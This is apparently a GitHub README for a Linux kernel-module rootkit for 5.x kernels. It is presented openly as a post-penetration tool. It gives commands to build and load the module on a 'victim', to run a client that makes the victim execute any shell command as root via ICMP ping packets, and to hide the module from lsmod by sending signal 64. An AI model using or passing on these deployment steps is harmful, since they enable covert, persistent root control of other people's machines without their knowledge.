/linux-rootkit

Remote Linux Loadable Kernel Module (LKM) rootkit (For Linux Kernels 5.x). Shell command execution by ping.

Primary LanguageCMIT LicenseMIT

Magic ping - shell execution

Action Check Compiling

Ping - ICMPv4 License - MIT Security - Post penetration

Tested on - 5.4.0-109-generic #123-Ubuntu x86_64 GNU/Linux Tested on - 5.13.0-40-generic #45~20.04.1-Ubuntu x86_64 GNU/Linux

Features:

  • Romete shell command execution by ping.
  • Hiding (or Showing) Kernel Module from Userspace.

Asciinema Demo

asciicast

Compile

compile server(victim) kernel module:

cd server && make

Client(attacker):

cd client && make

Romete server (victim):

sudo insmod server.ko

Local attacker:

Need root privilege to send icmp packets for ping.

sudo ./client <victim ip address>

Then you can let remote victim execute whatever shell command you input as root privilege (some command may need full path).

Hide(Show) remote kernel module:

Send signal 64 to show or hide:

kill -64 1

Use lsmod to check.

Thanks && Reference: